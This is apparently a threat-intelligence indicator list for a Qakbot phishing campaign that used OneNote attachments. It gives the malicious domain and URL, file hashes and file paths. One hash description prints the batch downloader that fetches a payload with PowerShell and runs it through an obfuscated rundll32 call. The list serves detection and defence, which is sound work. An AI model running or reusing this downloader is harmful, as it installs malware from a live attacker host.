Pulse name: Phishing 20230207-01 Qakbot OneNote
WHITE DoctorZl0 2023-02-07 Modified: 2023-03-09
7 IOCs
LOW VOLUME
Threat actor: MALLARD SPIDER
MITRE ATT&CK & Malware Families
MALWARE FAMILIES: Qakbot
Indicators of Compromise (7)
| TYPE | INDICATOR | DESCRIPTION | CREATED |
|---|---|---|---|
| URL | https://laoitserv.com/Vos/00.gif | | 2023-02-07 |
| FileHash-SHA256 | a8761a7615773f0e3215b6a3335a587802026f9966af6c1fbf14cc746f7c9df9 | Malware - MS OneNote file | 2023-02-07 |
| domain | laoitserv.com | | 2023-02-07 |
| FileHash-MD5 | 6b47a1e167e2dfad4edb0d3766c5ae4b | | 2023-02-07 |
| FileHash-SHA256 | 7e466c9bedb65b3b2519cb60532b5424285a969a1947ec648c4e5d566176216c | ..@echo off....powershell Invoke-WebRequest -URI https://laoitserv.com/Vos/00.gif -OutFile C:\programdata\big.jpg..call ru%1l32 C:\programdata\big.jpg,DllRegisterServer....exit.... | 2023-02-07 |
| FilePath | C:\ProgramData\in.cmd | | 2023-02-08 |
| FilePath | C:\programdata\big.jpg | | 2023-02-08 |